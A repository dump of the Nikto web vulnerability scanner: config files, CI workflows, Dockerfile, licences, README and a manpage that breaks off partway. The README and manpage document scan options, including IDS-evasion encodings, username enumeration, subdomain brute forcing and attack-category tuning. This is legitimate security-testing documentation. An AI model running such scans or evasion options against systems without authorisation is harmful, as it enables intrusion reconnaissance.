[
  {
    "path": ".dockerignore",
    "content": ".git\n.gitignore\n.gitattributes\n.editorconfig\n.github\nCOPYING\ndevdocs\ndocumentation\nREADME.md\n"
  },
  {
    "path": ".editorconfig",
    "content": "root = true\n\n[*]\ncharset = utf-8\nend_of_line = lf\ntrim_trailing_whitespace = true\ninsert_final_newline = true\n\n[*.{pl,plugin}]\nindent_style = space\nindent_size = 4\n\n[*.{xml,tmpl}]\nindent_style = space\nindent_size = 2\n"
  },
  {
    "path": ".gitattributes",
    "content": "*   text=auto eol=lf\n"
  },
  {
    "path": ".github/FUNDING.yml",
    "content": "patreon: sullo\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/FeatureRequest.md",
    "content": "---\nname: Feature Request\nabout: Request a new feature for Nikto\ntitle: 'Feature: '\nlabels: 'enhancement'\nassignees: ''\n\n---\n### Description\n\n### Links/Info\n\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/TestRequest.md",
    "content": "---\nname: New Test \nabout: Reqeust a new test in Nikto\ntitle: 'Test Request: '\nlabels: 'check'\nassignees: ''\n\n---\n### Description\n\n### Path\n\n### Matching text (in response)\n\n### Links/Info\n\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/bug_report.md",
    "content": "---\nname: Bug Report\nabout: Report an issue found in Nikto\ntitle: 'Bug: '\nlabels: bug\nassignees: ''\n\n---\n### Expected behavior\n\n### Actual behavior\n\n### Steps to reproduce\n\n1.\n2.\n3.\n\n### Nikto version\n\nRun:\n\n```\n./nikto.pl -Version\n```\n\nand paste the output here.\n\n### Further technical info\n\nE.g. you can obtain Nikto debug output by running `-D D` and redirecting to a file.\nYou may also scrub the output of hostnames and IPs by specifying `-D DS`.\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/config.yml",
    "content": "blank_issues_enabled: false\n"
  },
  {
    "path": ".github/ISSUE_TEMPLATE/false_positive_negative_report.md",
    "content": "---\nname: False positive / negative Report\nabout: Report a false positive / negative found by Nikto\ntitle: 'False Positive/Negative: '\nlabels: bug\nassignees: ''\n\n---\n\n### Output of suspected false positive / negative\n\nPost any useful information like the ID of the test causing the false positive.\n\n### Debug output\n\nRun:\n\n```\n./nikto.pl -host targethost -Save false_positive\n```\n\nThis saves all positive responses to a new `false_positive` directory. Afterwards look\nfor the related ID of the false positive / negative and paste it below.\n"
  },
  {
    "path": ".github/workflows/docker-build-push.yaml",
    "content": "name: Build and Push Docker Image\n\non:\n  push:\n    branches:\n      - master\n\npermissions:\n  contents: read\n  packages: write\n\njobs:\n  build-and-push:\n    runs-on: ubuntu-latest\n\n    steps:\n      - name: Checkout repository\n        uses: actions/checkout@v4\n\n      - name: Set up Docker Buildx\n        uses: docker/setup-buildx-action@v3\n\n      - name: Log in to GitHub Container Registry\n        uses: docker/login-action@v3\n        with:\n          registry: ghcr.io\n          username: ${{ github.actor }}\n          password: ${{ secrets.GITHUB_TOKEN }}\n\n      - name: Extract metadata for Docker\n        id: meta\n        uses: docker/metadata-action@v5\n        with:\n          images: ghcr.io/${{ github.repository_owner }}/nikto\n          tags: |\n            latest\n            type=ref,event=branch\n            type=sha\n\n      - name: Build and push Docker image\n        uses: docker/build-push-action@v5\n        with:\n          context: .\n          file: Dockerfile\n          push: true\n          platforms: linux/amd64,linux/arm64\n          tags: ${{ steps.meta.outputs.tags }}\n          labels: ${{ steps.meta.outputs.labels }}\n"
  },
  {
    "path": ".github/workflows/update-worker-manifest.yml",
    "content": "name: Update build timestamp + manifest\n\non:\n  push:\n    branches: [\"main\"]\n    # Prevent infinite loops: the commit that only updates program/.timestamp\n    # will NOT trigger this workflow.\n    paths-ignore:\n      - \"program/.timestamp\"\n\npermissions:\n  contents: write\n\njobs:\n  update:\n    # Extra safety: don't run if somehow triggered by the bot anyway\n    if: github.actor != 'github-actions[bot]'\n    runs-on: ubuntu-latest\n\n    steps:\n      - name: Checkout\n        uses: actions/checkout@v4\n        with:\n          fetch-depth: 1\n\n      - name: Compute epoch + parse Nikto version\n        id: meta\n        shell: bash\n        run: |\n          set -euo pipefail\n\n          EPOCH=\"$(git log -1 --format=%ct)\"\n          echo \"epoch=$EPOCH\" >> \"$GITHUB_OUTPUT\"\n\n          # Parse Nikto version from: $VARIABLES{'version'} = \"2.6.0\";\n          VERSION=\"$(perl -ne 'if(/\\$VARIABLES\\{\\s*[\"'\\''\"]version[\"'\\''\"]\\s*\\}\\s*=\\s*[\"'\\''\"]([^\"'\\''\"]+)[\"'\\''\"]\\s*;/){print $1; exit}' program/nikto.pl)\"\n\n          if [ -z \"${VERSION:-}\" ]; then\n            echo \"Failed to parse version from program/nikto.pl (\\$VARIABLES{version}).\" >&2\n            exit 1\n          fi\n\n          echo \"version=$VERSION\" >> \"$GITHUB_OUTPUT\"\n\n      - name: Update program/.timestamp\n        shell: bash\n        run: |\n          set -euo pipefail\n          mkdir -p program\n          echo \"${{ steps.meta.outputs.epoch }}\" > program/.timestamp\n\n      - name: Commit and push program/.timestamp if changed\n        shell: bash\n        run: |\n          set -euo pipefail\n\n          # Stage first so new files are included\n          git add program/.timestamp\n\n          # If staging produced no changes, exit\n          if git diff --cached --quiet; then\n            echo \"program/.timestamp unchanged\"\n            exit 0\n          fi\n\n          git config user.name \"github-actions[bot]\"\n          git config user.email \"github-actions[bot]@users.noreply.github.com\"\n          git commit -m \"chore: update program/.timestamp [skip ci]\"\n          git push\n\n      - name: Update Cloudflare Worker manifest\n        shell: bash\n        env:\n          UPDATE_URL: ${{ secrets.CF_WORKER_UPDATE_URL }}\n          UPDATE_TOKEN: ${{ secrets.CF_WORKER_UPDATE_TOKEN }}\n          VERSION: ${{ steps.meta.outputs.version }}\n          EPOCH: ${{ steps.meta.outputs.epoch }}\n        run: |\n          set -euo pipefail\n\n          if [ -z \"${UPDATE_URL:-}\" ] || [ -z \"${UPDATE_TOKEN:-}\" ]; then\n            echo \"Missing CF_WORKER_UPDATE_URL or CF_WORKER_UPDATE_TOKEN secrets.\" >&2\n            exit 1\n          fi\n\n          curl -fsS -X POST \"$UPDATE_URL\" \\\n            -H \"Authorization: Bearer $UPDATE_TOKEN\" \\\n            -H \"Content-Type: application/json\" \\\n            -d \"{\\\"version\\\":\\\"$VERSION\\\",\\\"epoch\\\":$EPOCH}\"\n"
  },
  {
    "path": ".gitignore",
    "content": ".DS_Store\ntests/udb_*\nnikto.conf\n.cursor\n"
  },
  {
    "path": "COPYING",
    "content": "##########################################################################################\n# Copyright (C) 2001–2026 Chris Sullo. All rights reserved.\n#\n# This license notice applies to: Nikto's code only\n#\n# See COPYING.libwhisker for LibWhisker licensing information.\n#\n# Database files are NOT licensed under the GPL and may only be distributed as part of\n# the official Nikto package or installer, for use exclusively with Nikto.\n#\n# For full licensing terms and commercial use policies, visit:\n# https://cirt.net/Nikto-Licensing\n##########################################################################################\n\nThis program is free software: you can redistribute it and/or modify  \nit under the terms of the GNU General Public License version 3,  \nas published by the Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,  \nbut WITHOUT ANY WARRANTY; without even the implied warranty of  \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  \nGNU General Public License for more details.\n\nThe full license text is available at: https://www.gnu.org/licenses/gpl-3.0.txt\n"
  },
  {
    "path": "COPYING.LibWhisker",
    "content": "LW2 Copyright (c) 2009, Jeff Forristal (wiretrip.net)\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:\n\n- Redistributions of source code must retain the above copyright\nnotice, this list of conditions and the following disclaimer.\n\n- Redistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\nCOPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\nLOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\nANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n"
  },
  {
    "path": "Dockerfile",
    "content": "FROM alpine:3.23.3\n\nLABEL version=\"2.6.0\" \\\n      author=\"Author Paul Sec (https://github.com/PaulSec), Nikto User https://github.com/drwetter\" \\\n      docker_build=\"docker build -t sullo/nikto:2.6.0 .\" \\\n      docker_run_basic=\"docker run --rm sullo/nikto:2.6.0 -h http://www.example.com\" \\\n      docker_run_advanced=\"docker run --rm -v $(pwd):/tmp sullo/nikto:2.6.0 -h http://www.example.com -o /tmp/out.json\"\n\nRUN echo 'Installing packages for Nikto.' && \\\n    apk add --no-cache \\\n      perl \\\n      perl-net-ssleay \\\n      perl-json \\\n      perl-io-socket-ssl \\\n      perl-xml-writer \\\n      perl-mime-base64 \\\n      perl-xml-libxml\n\nRUN echo 'Creating the nikto group.' && \\\n  addgroup -S nikto && \\\n  echo 'Creating the nikto user.' && \\\n  adduser -S -G nikto -g \"Nikto user\" -s /bin/sh nikto\n\nENV  PATH=${PATH}:/opt/nikto\nUSER nikto\n\nCOPY --chown=nikto:nikto [\"program/\", \"/opt/nikto\"]\nENTRYPOINT [\"/opt/nikto/nikto.pl\"]\n"
  },
  {
    "path": "README.md",
    "content": "nikto\n=====\n[![alt text](https://cirt.net/wp-content/uploads/2025/12/patreon.png \"Become a patron of Nikto!\")](https://www.patreon.com/sullo)\n\n\nNikto web server scanner  - https://cirt.net/Nikto2 \n\nFull documentation - https://github.com/sullo/nikto/wiki\n\nRun normally:\n\n~~~\ngit clone https://github.com/sullo/nikto\n# Main script is in program/\ncd nikto/program\n# Run using the shebang interpreter\n./nikto.pl -h http://www.example.com\n# Run using perl (if you forget to chmod)\nperl nikto.pl -h http://www.example.com\n~~~\n\nRun as a Docker container from ghcr.io:\n`docker pull ghcr.io/sullo/nikto:latest`\n\nRun as a Docker container from Dockerfile:\n\n~~~bash\ngit clone https://github.com/sullo/nikto.git\ncd nikto\ndocker build -t sullo/nikto .\n# Call it without arguments to display the full help\ndocker run --rm sullo/nikto\n# Basic usage\ndocker run --rm sullo/nikto -h http://www.example.com\n# To save the report in a specific format, mount /tmp as a volume:\ndocker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json\n~~~\n\nBasic usage:\n\n```\n   Options:\n       -Add-header         Add HTTP headers (can be used multiple times, one per header pair)\n       -ask+               Whether to ask about submitting updates\n                               yes   Ask about each (default)\n                               no    Don't ask, don't send\n                               auto  Don't ask, just send\n       -check6             Check if IPv6 is working (connects to ipv6.google.com or value set in nikto.conf)\n       -Cgidirs+           Scan these CGI dirs: \"none\", \"all\", or values like \"/cgi/ /cgi-a/\"\n       -config+            Use this config file\n       -Display+           Turn on/off display outputs:\n                               1     Show redirects\n                               2     Show cookies received\n                               3     Show all 200/OK responses\n                               4     Show URLs which require authentication\n                               D     Debug output\n                               E     Display all HTTP errors\n                               P     Print progress to STDOUT\n                               S     Scrub output of IPs and hostnames\n                               V     Verbose output\n       -dbcheck           Check database and other key files for syntax errors\n       -evasion+          Encoding technique:\n                               1     Random URI encoding (non-UTF8)\n                               2     Directory self-reference (/./)\n                               3     Premature URL ending\n                               4     Prepend long random string\n                               5     Fake parameter\n                               6     TAB as request spacer\n                               7     Change the case of the URL\n                               8     Use Windows directory separator (\\)\n                               A     Use a carriage return (0x0d) as a request spacer\n                               B     Use binary value 0x0b as a request spacer\n        -followredirects   Follow 3xx redirects to new location\n        -Format+           Save file (-o) format. Can specify multiple formats separated by commas (e.g., htm,sql,txt,json,xml):\n                               csv   Comma-separated-value\n                               json  JSON Format\n                               htm   HTML Format\n                               sql   Generic SQL (see docs for schema)\n                               sqld  SQL Direct (directly inserts into MySQL/PostgreSQL database)\n                               txt   Plain text\n                               xml   XML Format\n                               (if not specified the format will be taken from the file extension passed to -output)\n                               Note: sqld format requires DB_TYPE, DB_HOST, DB_PORT, DB_NAME in nikto.conf\n                                     and NIKTO_DB_USER, NIKTO_DB_PASS environment variables\n       -Help              This help information\n       -host+             Target host/URL\n       -id+               Host authentication to use, format is id:pass or id:pass:realm\n       -ipv4              IPv4 Only\n       -ipv6              IPv6 Only\n       -key+              Client certificate key file\n       -list-plugins      List all available plugins, perform no testing\n       -maxtime+          Maximum testing time per host (e.g., 1h, 60m, 3600s)\n       -mutate+           Guess additional file names:\n                               1     Test all files with all root directories\n                               2     Guess for password file names\n                               3     Enumerate user names via Apache (/~user type requests)\n                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)\n                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain\n                               6     Attempt to guess directory names from the supplied dictionary file\n       -mutate-options    Provide information for mutates\n       -nocheck           Don't check for updates on startup\n       -nocookies         Do not use cookies from responses in requests (cookies are stored and sent by default)\n       -nointeractive     Disables interactive features\n       -nolookup          Disables DNS lookups\n       -noslash           Strip trailing slash from URL (e.g., '/admin/' to '/admin')\n       -nossl             Disables the use of SSL\n       -no404             Disables nikto attempting to guess a 404 page\n       -Option            Over-ride an option in nikto.conf, can be issued multiple times\n       -output+           Write output to this file ('.' for auto-name)\n       -Pause+            Pause between tests (seconds)\n       -Platform+         Platform of target (nix, win, all)\n       -Plugins+          List of plugins to run (default: ALL)\n       -port+             Port to use (default 80)\n       -RSAcert+          Client certificate file\n       -root+             Prepend root value to all requests, format is /directory\n       -Save              Save positive responses to this directory ('.' for auto-name)\n       -ssl               Force ssl mode on port\n       -Tuning+           Scan tuning:\n                               1     Interesting File / Seen in logs\n                               2     Misconfiguration / Default File\n                               3     Information Disclosure\n                               4     Injection (XSS/Script/HTML)\n                               5     Remote File Retrieval - Inside Web Root\n                               6     Denial of Service\n                               7     Remote File Retrieval - Server Wide\n                               8     Command Execution / Remote Shell\n                               9     SQL Injection\n                               0     File Upload\n                               a     Authentication Bypass\n                               b     Software Identification\n                               c     Remote Source Inclusion\n                               d     WebService\n                               e     Administrative Console\n                               x     Reverse Tuning Options (i.e., include all except specified)\n       -timeout+          Timeout for requests (default 10 seconds)\n       -Userdbs           Load only user databases, not the standard databases\n                               all   Disable standard dbs and load only user dbs\n                               tests Disable only db_tests and load udb_tests\n       -useragent         Force User-Agent instead of pulling from database\n       -url+              Target host/URL (alias of -host)\n       -useproxy          Use the proxy defined in nikto.conf, or argument http://server:port\n       -Version           Print plugin and database versions\n       -vhost+            Virtual host (for Host header)\n       -404code           Ignore these HTTP codes as negative responses (always). Format is \"302,301\".\n       -404string         Ignore this string in response body content as negative response (always). Can be a regular expression.\n            + requires a value\n```\n\n# Nikto DSL Matchers\n\nNikto's test database supports a mini-DSL for matching responses. The following matchers are supported:\n\n- `BODY:` and `!BODY:` — Match or exclude content in the response body.\n- `HEADER:` and `!HEADER:` — Match or exclude content in HTTP headers.\n- `COOKIE:` and `!COOKIE:` — Match or exclude content in HTTP cookies. (NEW)\n- `CODE:` and `!CODE:` — Match or exclude HTTP status codes.\n\nYou can combine multiple matchers with `&&` (AND). Example:\n\n    BODY:login&&!BODY:logout&&HEADER:X-Powered-By&&COOKIE:sessionid\n\nThis will match if the response body contains \"login\", does not contain \"logout\", the headers include \"X-Powered-By\", and a cookie named \"sessionid\" is present.\n\nLicense\n=======\nCopyright (C) 2001–2026 Chris Sullo. All rights reserved.\n\nThis license notice applies to: Nikto's code only\n\nSee [COPYING.LibWhisker](COPYING.LibWhisker) for LibWhisker licensing information.\n\nDatabase files are NOT licensed under the GPL and may only be distributed as part of the official Nikto package or installer, for use exclusively with Nikto.\n\nFor full licensing terms and commercial use policies, visit:\nhttps://cirt.net/Nikto-Licensing\n\nThis program is free software: you can redistribute it and/or modify  it under the terms of the GNU General Public License version 3,  as published by the Free Software Foundation.\n\nThis program is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU General Public License for more details.\n\nThe full license text is available at: https://www.gnu.org/licenses/gpl-3.0.txt\n\nSee [COPYING](COPYING) for the complete license notice.\n"
  },
  {
    "path": "documentation/manpage.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE refentry PUBLIC \"-//OASIS//DTD DocBook XML V4.1.2//EN\" \"http://www.oasis-open.org/docbook/xml/4.1.2/docbookx.dtd\" [\n<!ENTITY description SYSTEM \"sections/description.xml\">\n<!ENTITY options SYSTEM \"sections/options.xml\">\n<!ENTITY files SYSTEM \"sections/files.xml\">\n<!ENTITY bugs SYSTEM \"sections/bugs.xml\">\n<!ENTITY authors SYSTEM \"sections/authors.xml\">\n<!ENTITY product \"nikto.pl\">\n]>\n\n<refentry id=\"commands.nikto\">\n  <refentryinfo>\n    <productname>&product;</productname>\n  </refentryinfo>\n \n  <refmeta>\n    <refentrytitle>&product;</refentrytitle>\n    <manvolnum>1</manvolnum>\n    <refmiscinfo class=\"version\">2.5.0</refmiscinfo>\n    <refmiscinfo class=\"source\">http://www.cirt.net/</refmiscinfo>\n    <refmiscinfo class=\"manual\">Vulnerability Scanner</refmiscinfo>\n  </refmeta>\n\n  <refnamediv>\n    <refname>nikto.pl</refname>\n    <refpurpose>Scan web server for known vulnerabilities</refpurpose>\n  </refnamediv>\n\n  <refsynopsisdiv>\n    <cmdsynopsis>\n      <command>nikto.pl</command>\n      <arg choice=\"opt\" rep=\"repeat\">options</arg>\n    </cmdsynopsis>\n  </refsynopsisdiv>\n\n  <refsect1>\n    <title>Description</title>\n    <para>\n      Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items that are generally considered dangerous. It checks for:\n    </para>\n    <itemizedlist>\n      <listitem><para>Server and software misconfigurations</para></listitem>\n      <listitem><para>Default files and programs</para></listitem>\n      <listitem><para>Insecure files and programs</para></listitem>\n      <listitem><para>Outdated servers and programs</para></listitem>\n      <listitem><para>Dangerous files</para></listitem>\n      <listitem><para>Other problems</para></listitem>\n    </itemizedlist>\n    <para>\n      Nikto is built on LibWhisker2 (LW2) and can run on any platform which has a Perl environment. It supports SSL, proxies, host authentication, attack encoding and more. It can be updated automatically from the command-line, and supports the optional submission of updated version data back to the maintainers.\n    </para>\n  </refsect1>\n\n  <refsect1>\n    <title>Options</title>\n    <variablelist>\n      <varlistentry>\n        <term><option>-ask</option> <replaceable>yes|no|auto</replaceable></term>\n        <listitem>\n          <para>Whether to ask about submitting updates. Options: yes (ask about each), no (don't ask, don't send), auto (don't ask, just send).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Add-header</option> <replaceable>header:value</replaceable></term>\n        <listitem>\n          <para>Add HTTP headers (can be used multiple times, one per header pair).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-check6</option></term>\n        <listitem>\n          <para>Check if IPv6 is working (connects to ipv6.google.com or value set in nikto.conf).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Cgidirs</option> <replaceable>dirs</replaceable></term>\n        <listitem>\n          <para>Scan these CGI directories. Special words \"none\" or \"all\" may be used. A literal value for a CGI directory such as \"/cgi-test/\" may be specified (must include trailing slash).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-config</option> <replaceable>file</replaceable></term>\n        <listitem>\n          <para>Use this config file instead of the default nikto.conf.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-dbcheck</option></term>\n        <listitem>\n          <para>Check database and other key files for syntax errors.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Display</option> <replaceable>options</replaceable></term>\n        <listitem>\n          <para>Turn on/off display outputs: 1 (Show redirects), 2 (Show cookies received), 3 (Show all 200/OK responses), 4 (Show URLs which require authentication), D (Debug output), E (Display all HTTP errors), P (Print progress to STDOUT), S (Scrub output of IPs and hostnames), V (Verbose output).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-evasion</option> <replaceable>technique</replaceable></term>\n        <listitem>\n          <para>Encoding technique: 1 (Random URI encoding), 2 (Directory self-reference), 3 (Premature URL ending), 4 (Prepend long random string), 5 (Fake parameter), 6 (TAB as request spacer), 7 (Change the case of the URL), 8 (Use Windows directory separator), A (Use carriage return as request spacer), B (Use binary value 0x0b as request spacer).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-followredirects</option></term>\n        <listitem>\n          <para>Follow 3xx redirects to new location.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Format</option> <replaceable>format</replaceable></term>\n        <listitem>\n          <para>Save file format: csv (Comma-separated-value), json (JSON Format), htm (HTML Format), sql (Generic SQL, see docs for schema), sqld (SQL Direct, directly inserts into MySQL/PostgreSQL database), txt (Plain text), xml (XML Format). Multiple formats can be specified as a comma-separated list. If not specified, the format will be taken from the file extension passed to -output. Note: sqld format requires DB_TYPE, DB_HOST, DB_PORT, DB_NAME in nikto.conf and NIKTO_DB_USER, NIKTO_DB_PASS environment variables.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Help</option></term>\n        <listitem>\n          <para>Display extended help information.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-host</option> <replaceable>target</replaceable></term>\n        <listitem>\n          <para>Host(s) to target. Can be an IP address, hostname or text file of hosts. A single dash (-) maybe used for stdout. Can also parse nmap -oG style output.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-id</option> <replaceable>id:pass[:realm]</replaceable></term>\n        <listitem>\n          <para>ID and password to use for host Basic host authentication. Format is \"id:password\" or \"id:password:realm\".</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-ipv4</option></term>\n        <listitem>\n          <para>IPv4 Only.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-ipv6</option></term>\n        <listitem>\n          <para>IPv6 Only.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-key</option> <replaceable>file</replaceable></term>\n        <listitem>\n          <para>Client certificate key file.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-list-plugins</option></term>\n        <listitem>\n          <para>List all available plugins, perform no testing.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-maxtime</option> <replaceable>time</replaceable></term>\n        <listitem>\n          <para>Maximum testing time per host (e.g., 1h, 60m, 3600s).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-mutate</option> <replaceable>options</replaceable></term>\n        <listitem>\n          <para>Guess additional file names: 1 (Test all files with all root directories), 2 (Guess for password file names), 3 (Enumerate user names via Apache), 4 (Enumerate user names via cgiwrap), 6 (Attempt to guess directory names from dictionary file).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-mutate-options</option> <replaceable>options</replaceable></term>\n        <listitem>\n          <para>Provide information for mutates.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-no404</option></term>\n        <listitem>\n          <para>Disables nikto attempting to guess a 404 page.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-nocookies</option></term>\n        <listitem>\n          <para>Do not use cookies from responses in requests.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-nointeractive</option></term>\n        <listitem>\n          <para>Disable interactive features.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-nolookup</option></term>\n        <listitem>\n          <para>Do not perform name lookups on IP addresses.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-noslash</option></term>\n        <listitem>\n          <para>Strip trailing slash from URL (e.g., '/admin/' to '/admin').</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-nossl</option></term>\n        <listitem>\n          <para>Do not use SSL to connect to the server.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Option</option> <replaceable>name=value</replaceable></term>\n        <listitem>\n          <para>Over-ride an option in nikto.conf, can be issued multiple times.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-output</option> <replaceable>file</replaceable></term>\n        <listitem>\n          <para>Write output to the file specified ('.' for auto-name). The format used will be taken from the file extension. This can be over-ridden by using the -Format option.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Pause</option> <replaceable>seconds</replaceable></term>\n        <listitem>\n          <para>Seconds (integer or floating point) to delay between each test.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Platform</option> <replaceable>platform</replaceable></term>\n        <listitem>\n          <para>Platform of target: nix (Unix/Linux), win (Windows), or all (both).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Plugins</option> <replaceable>list</replaceable></term>\n        <listitem>\n          <para>List of plugins to run (default: ALL).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-port</option> <replaceable>ports</replaceable></term>\n        <listitem>\n          <para>TCP port(s) to target. To test more than one port on the same host, specify the list of ports. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). If not specified, port 80 is used.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-RSAcert</option> <replaceable>file</replaceable></term>\n        <listitem>\n          <para>Client certificate file.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-root</option> <replaceable>path</replaceable></term>\n        <listitem>\n          <para>Prepend root value to all requests, format is /directory.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Save</option> <replaceable>directory</replaceable></term>\n        <listitem>\n          <para>Save positive responses to this directory ('.' for auto-name).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-ssl</option></term>\n        <listitem>\n          <para>Only test SSL on the ports specified. Using this option will dramatically speed up requests to HTTPS ports, since otherwise the HTTP request will have to timeout first.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-timeout</option> <replaceable>seconds</replaceable></term>\n        <listitem>\n          <para>Seconds to wait before timing out a request. Default timeout is 10 seconds.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Tuning</option> <replaceable>options</replaceable></term>\n        <listitem>\n          <para>Tuning options will control the test that Nikto will use against a target. By default, if any options are specified, only those tests will be performed. If the \"x\" option is used, it will reverse the logic and exclude only those tests. Use the reference number or letter to specify the type, multiple may be used:</para>\n          <itemizedlist>\n            <listitem><para>0 - File Upload</para></listitem>\n            <listitem><para>1 - Interesting File / Seen in logs</para></listitem>\n            <listitem><para>2 - Misconfiguration / Default File</para></listitem>\n            <listitem><para>3 - Information Disclosure</para></listitem>\n            <listitem><para>4 - Injection (XSS/Script/HTML)</para></listitem>\n            <listitem><para>5 - Remote File Retrieval - Inside Web Root</para></listitem>\n            <listitem><para>6 - Denial of Service</para></listitem>\n            <listitem><para>7 - Remote File Retrieval - Server Wide</para></listitem>\n            <listitem><para>8 - Command Execution / Remote Shell</para></listitem>\n            <listitem><para>9 - SQL Injection</para></listitem>\n            <listitem><para>a - Authentication Bypass</para></listitem>\n            <listitem><para>b - Software Identification</para></listitem>\n            <listitem><para>c - Remote Source Inclusion</para></listitem>\n            <listitem><para>d - WebService</para></listitem>\n            <listitem><para>e - Administrative Console</para></listitem>\n            <listitem><para>x - Reverse Tuning Options (i.e., include all except specified)</para></listitem>\n          </itemizedlist>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-url</option> <replaceable>target</replaceable></term>\n        <listitem>\n          <para>Target host/URL (alias of -host).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Userdbs</option> <replaceable>type</replaceable></term>\n        <listitem>\n          <para>Load only user databases, not the standard databases. Options: all (Disable standard dbs and load only user dbs), tests (Disable only db_tests and load udb_tests).</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-useragent</option> <replaceable>string</replaceable></term>\n        <listitem>\n          <para>Over-rides the default useragent.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-useproxy</option> <replaceable>proxy</replaceable></term>\n        <listitem>\n          <para>Use the HTTP proxy defined in the configuration file, or given as argument in the format http://server:port.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-Version</option></term>\n        <listitem>\n          <para>Display the Nikto software, plugin and database versions.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-vhost</option> <replaceable>hostname</replaceable></term>\n        <listitem>\n          <para>Specify the Host header to be sent to the target.</para>\n        </listitem>\n      </varlistentry>\n\n      <varlistentry>\n        <term><option>-404code</option> <replaceable>codes</replaceable></term>\n        <listitem>\n          <para>Ignore these HTTP codes as negative responses (always). Format is \"302,301\".</para>\n        </listitem>\n      </varlistentry>\n\n      